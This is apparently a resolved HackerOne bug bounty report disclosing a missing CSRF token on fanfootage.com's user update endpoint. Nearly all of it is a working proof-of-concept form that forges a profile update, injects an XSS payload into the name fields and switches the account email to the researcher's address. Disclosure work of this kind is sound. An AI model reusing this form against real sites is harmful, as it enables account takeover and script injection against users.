NO CSRF token found on user details update
Unknown
Vulnerability Details
Here is the CSRF
<html>
<!-- CSRF PoC BY Chandrakant -->
<body>
<form action="https://fanfootage.com/users/update" method="POST">
<input type="hidden" name="utf8" value="✓" />
<input type="hidden" name="_method" value="patch" />
<input type="hidden" name="user[username]" value=""><img src=x onerror=alert(1)>" />
<input type="hidden" name="user[email]" value="chandrakantnial8@gmail.com" />
<input type="hidden" name="user[full_name]" value=""><img src=x onerror=alert(1)>" />
<input type="hidden" name="commit" value="Done" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
Actions
View on HackerOneReport Stats
- Report ID: 15454
- State: Closed
- Substate: resolved
- Upvotes: 1